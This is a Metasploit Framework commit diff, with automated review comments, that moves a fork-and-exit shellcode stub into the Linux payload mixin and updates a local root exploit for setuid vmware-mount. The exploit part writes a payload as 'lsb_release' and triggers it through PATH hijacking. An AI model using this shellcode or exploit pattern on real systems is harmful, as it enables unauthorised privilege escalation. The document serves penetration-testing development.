Land #2325, @jlee-r7's Linux PrependFork addition
commit
206b52ea30
|
@ -19,6 +19,13 @@ module Msf::Payload::Linux
|
|||
|
||||
register_advanced_options(
|
||||
[
|
||||
Msf::OptBool.new('PrependFork',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes: if (fork()) { exit(0); }",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetresuid',
|
||||
[
|
||||
false,
|
||||
|
@ -97,6 +104,17 @@ module Msf::Payload::Linux
|
|||
|
||||
# Prepend
|
||||
|
||||
if (datastore['PrependFork'])
|
||||
pre << "\x6a\x02" +# pushb $0x2 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 ; fork #
|
||||
"\x85\xc0" +# test %eax,%eax #
|
||||
"\x74\x06" +# jz 0xf #
|
||||
"\x31\xc0" +# xor %eax,%eax #
|
||||
"\xb0\x01" +# movb $0x1,%al ; exit #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
|
@ -197,10 +215,8 @@ module Msf::Payload::Linux
|
|||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
# Handle all Power/CBEA code here
|
||||
if (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
|
||||
elsif (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
|
||||
|
||||
# Prepend
|
||||
|
||||
|
@ -277,9 +293,21 @@ module Msf::Payload::Linux
|
|||
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
end
|
||||
|
||||
if (test_arch.include?(ARCH_X86_64))
|
||||
elsif (test_arch.include?(ARCH_X86_64))
|
||||
|
||||
if (datastore['PrependFork'])
|
||||
# if (fork()) { exit(0); }
|
||||
pre << "\x6a\x39" # push 57 ; __NR_fork #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
pre << "\x48\x85\xc0" # test rax,rax #
|
||||
pre << "\x74\x08" # jz 0x08 #
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x6a\x3c" # push 60 ; __NR_exit #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
|
@ -389,8 +417,8 @@ module Msf::Payload::Linux
|
|||
# Append exit(0)
|
||||
if (datastore['AppendExit'])
|
||||
app << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x6a\x3c" # push 0x53 #
|
||||
pre << "\x58" # pop rax #
|
||||
app << "\x6a\x3c" # push 0x3c #
|
||||
app << "\x58" # pop rax #
|
||||
app << "\x0f\x05" # syscall #
|
||||
end
|
||||
end
|
||||
|
|
|
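Review bot: The new `elsif (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))` in the third hunk asks whether `test_arch` contains that four-element array as a single element, so if `test_arch` is a flat list of arch constants (as `test_arch.include?(ARCH_X86_64)` in the next hunk suggests) the branch can never fire and the PPC prepends are dead code; `elsif (test_arch & [ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]).any?` would express the intended membership test. The condition is carried over from the removed `if`, so it predates this commit, but reshaping the block into an if/elsif chain is the natural moment to fix it. Separately, the x86 PrependFork stub in the second hunk never loads %ebx before the exit `int $0x80`, so the parent's exit status is whatever %ebx held rather than the 0 the option description promises, whereas the x86_64 stub does `xor rdi,rdi` first; adding `"\x31\xdb" + # xor %ebx,%ebx` after the jump and widening it to `"\x74\x08" + # jz` would make the two architectures consistent. The enclosing method starts and ends outside these hunks.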
@ -43,6 +43,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
'DefaultOptions' => {
|
||||
"PrependSetresuid" => true,
|
||||
"PrependSetresgid" => true,
|
||||
"PrependFork" => true,
|
||||
},
|
||||
'Privileged' => true,
|
||||
'DefaultTarget' => 0,
|
||||
|
@ -56,8 +57,6 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
'DisclosureDate' => "Aug 22 2013"
|
||||
}
|
||||
))
|
||||
# Handled by ghetto hardcoding below.
|
||||
deregister_options("PrependFork")
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -73,22 +72,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
|
||||
end
|
||||
|
||||
# Ghetto PrependFork action which is apparently only implemented for
|
||||
# Meterpreter.
|
||||
# XXX Put this in a mixin somewhere
|
||||
# if(fork()) exit(0);
|
||||
# 6A02 push byte +0x2
|
||||
# 58 pop eax
|
||||
# CD80 int 0x80 ; fork
|
||||
# 85C0 test eax,eax
|
||||
# 7406 jz 0xf
|
||||
# 31C0 xor eax,eax
|
||||
# B001 mov al,0x1
|
||||
# CD80 int 0x80 ; exit
|
||||
exe = generate_payload_exe(
|
||||
:code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
|
||||
)
|
||||
write_file("lsb_release", exe)
|
||||
write_file("lsb_release", generate_payload_exe)
|
||||
|
||||
cmd_exec("chmod +x lsb_release")
|
||||
cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
|
||||
|
|
|
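Review bot: The first hunk adds `"PrependFork" => true` to `DefaultOptions` without any explanation, while the third hunk deletes the only comment block that documented why this exploit forks at all, so the reason is now recorded nowhere in the module; a one-line comment next to the new default, e.g. `# The payload is executed in place of lsb_release by the setuid vmware-mount, so fork and let the parent exit promptly`, would preserve that intent. The replacement `write_file("lsb_release", generate_payload_exe)` also relies on the selected payload honouring `PrependFork`; if a payload without that option is chosen the default is silently ignored, which is worth a note or a check in the exploit. `write_file`'s return value is not examined before `cmd_exec("chmod +x lsb_release")`, so a failed write is only discovered when the trigger does nothing. The enclosing method body continues outside the hunk.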
@ -11,6 +11,7 @@ require 'msf/base/sessions/command_shell'
|
|||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
|
|
|
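Review bot: The added `include Msf::Payload::Linux` only delivers the `PrependFork` advanced option if this module's `initialize` chains to `super` so the mixin's `register_advanced_options` runs; `def initialize(info = {})` is the last line of the hunk and its body is outside it, so that should be confirmed. The same one-line include is added to the module in the final section of this commit, and the same check applies there. If the include is meant to replace the per-module option that the other hunks remove, a short comment such as `# Provides the Prepend* advanced options (PrependFork, PrependSetresuid, ...)` would tell the next reader why a command-shell stager pulls in the Linux payload mixin.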
@ -24,7 +24,6 @@ module Metasploit3
|
|||
'Session' => Msf::Sessions::Meterpreter_x86_Linux))
|
||||
|
||||
register_options([
|
||||
OptBool.new('PrependFork', [ false, "Add a fork() / exit_group() (for parent) code" ]),
|
||||
OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ])
|
||||
], self.class)
|
||||
end
|
||||
|
@ -71,21 +70,6 @@ module Metasploit3
|
|||
|
||||
midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp
|
||||
|
||||
if(datastore['PrependFork'])
|
||||
# fork() / parent does exit()
|
||||
|
||||
# If the target process is threaded, this means the thread
|
||||
# will exit. exit_group() will try to close the process down
|
||||
# completely.. and if we do that, it may not be reaped
|
||||
# correctly.
|
||||
#
|
||||
# Plus, depending on the vuln, we might get multiple shots at
|
||||
# owning a finite amount of threads.
|
||||
|
||||
midstager <<
|
||||
"\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80"
|
||||
end
|
||||
|
||||
midstager <<
|
||||
"\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
|
||||
"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +
|
||||
|
|
|
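Review bot: Removing the `OptBool.new('PrependFork', ...)` line leaves this module depending on the `PrependFork` option registered by `Msf::Payload::Linux`, but neither hunk in this file adds that include (the other two modules in this commit receive it explicitly), so whether the option still exists here depends on code outside the hunks; if it does not, `datastore['PrependFork']` is nil and the fork is silently disabled rather than failing loudly. The deleted comment about threaded targets — that the parent must call exit() rather than exit_group() so only the hijacked thread dies and the process is reaped correctly — was the only record of that rationale, and the generic x86 stub keeps the same `exit` syscall, so I would carry it over as `# exit(), not exit_group(): on a threaded target only the hijacked thread should die` next to the mixin's stub. The method containing the midstager begins and ends outside the hunk.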
@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell'
|
|||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
|
|